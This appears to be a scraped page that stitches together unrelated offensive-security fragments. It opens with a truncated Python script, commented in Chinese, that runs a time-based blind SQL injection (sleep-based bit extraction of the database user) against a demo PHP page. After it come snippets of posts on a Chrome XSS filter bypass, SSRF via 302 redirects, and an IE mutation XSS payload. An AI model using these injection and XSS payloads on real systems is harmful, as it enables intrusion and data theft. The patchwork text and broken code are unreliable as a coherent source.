#!/usr/bin/env python # -*- coding: utf-8 -*- # 延迟注入工具 import urllib2 import time import socket import threading import requests class my_threading(threading.Thread): def __init__(self, str,x): threading.Thread.__init__(self) self.str = str self.x = x def run(self): global res x=self.x j = self.str url = "http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23" html = request(url) verify = 'timeout' if verify not in html: res[str(j)] = 0 #print 1

Bypassing Chrome’s Anti-XSS Filter,绕过谷歌浏览器 XSS 过滤器

Hi! Just wanted to share my finding. I’ve found a way to bypass Chrome’s anti-xss filter. This bypass is universal, and it defeats Chrome’s XSSAuditor in all cases! Description XSS attacks occur when one website injects JavaScript code into otherwise legitimate requests to another website. The injected script generally attempts to access privileged


浅谈代码中的重定向 he1renyagao ( | 2015-06-21 16:40 今天,回顾下以前挖洞的思路,看到SSRF 这个问题,突然觉得利用302跳转来绕过这个点有点想法,于是自己测试了下。

New IE mutation vector

I was messing around with a filter that didn’t correctly filter attribute names and allowed a blank one which enabled me to bypass it. I thought maybe IE had similar issues when rewriting innerHTML. Yes it does of course The filter bypass worked like this: <img ="><script>alert(1)</script>"> The filter incorrectly assumed it was still inside an attribute and therefore allowed raw html to be injected